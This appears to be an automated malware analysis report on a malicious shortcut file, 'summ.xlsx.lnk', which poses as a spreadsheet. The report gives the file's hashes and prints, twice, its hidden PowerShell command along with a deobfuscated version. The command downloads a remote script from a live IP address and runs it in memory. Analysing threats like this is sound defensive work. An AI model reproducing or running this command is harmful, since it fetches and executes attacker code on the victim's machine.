|
Hash | Hash Value |
|---|---|
| MD5 | 90cbc89aa332c6b21906a3e6a6ec1827
|
| Sha1 | bbafe87e8ccb4402f88cef55c4da65a4dd5c3d7a
|
| Sha256 | 19908832f56b96678064ce686c8982e4c46c9a3ef4b489b114843087eec97daa
|
| Sha384 | 0aa85188fe420e3c158e6fbaed10bf05c2d1323f81641fee508c528b15f8b3de9ed9aa776b527cfc15e00234fd15a18f
|
| Sha512 | de02c21a3c60ac37c77ed4dd4d0c2a431cdde934f9bf626b73955af4334a82660e57515426be60e5991d13b9de28ac53f9d02faf7ab22dcd1eecf091d7d90cff
|
| SSDeep | 24:9aKk/oKK5JvPJfCii7xoe6rPR5/6snPidNZx8yOyi:9aKEKJHJf4xoe6jR5hPidNZxRM
|
| TLSH | D0E1F02027FB4714F1BA7F3959BB77558C29BE58EE21C78D1520A00E49B0B60EC25B3E
|
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe -w Hidden $r = New-Object -ComObject 'WinHttp.WinHttpRequest.5.1'; $r.Open('GET', 'http://46.161.0.94/mirmLAT/departuredishwasher.ps1', $false); $r.SetRequestHeader('User-Agent', 'UA WindowsPowerShell'); $r.Send(); . ([ScriptBlock]::Create($r.ResponseText)) |
| Deobfuscated PowerShell | -w "Hidden" $r "=" "New-Object" -ComObject "WinHttp.WinHttpRequest.5.1" $r."Open"("GET", "http://46.161.0.94/mirmLAT/departuredishwasher.ps1", $false) $r."SetRequestHeader"("User-Agent", "UA WindowsPowerShell") $r."Send"() . ([ScriptBlock]::"Create"($r."ResponseText")) |
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe -w Hidden $r = New-Object -ComObject 'WinHttp.WinHttpRequest.5.1'; $r.Open('GET', 'http://46.161.0.94/mirmLAT/departuredishwasher.ps1', $false); $r.SetRequestHeader('User-Agent', 'UA WindowsPowerShell'); $r.Send(); . ([ScriptBlock]::Create($r.ResponseText)) Malicious |
90cbc89aa332c6b21906a3e6a6ec1827 > summ.xlsx.lnk |
| Deobfuscated PowerShell | -w "Hidden" $r "=" "New-Object" -ComObject "WinHttp.WinHttpRequest.5.1" $r."Open"("GET", "http://46.161.0.94/mirmLAT/departuredishwasher.ps1", $false) $r."SetRequestHeader"("User-Agent", "UA WindowsPowerShell") $r."Send"() . ([ScriptBlock]::"Create"($r."ResponseText")) Malicious |
90cbc89aa332c6b21906a3e6a6ec1827 > summ.xlsx.lnk > LNK CommandLine |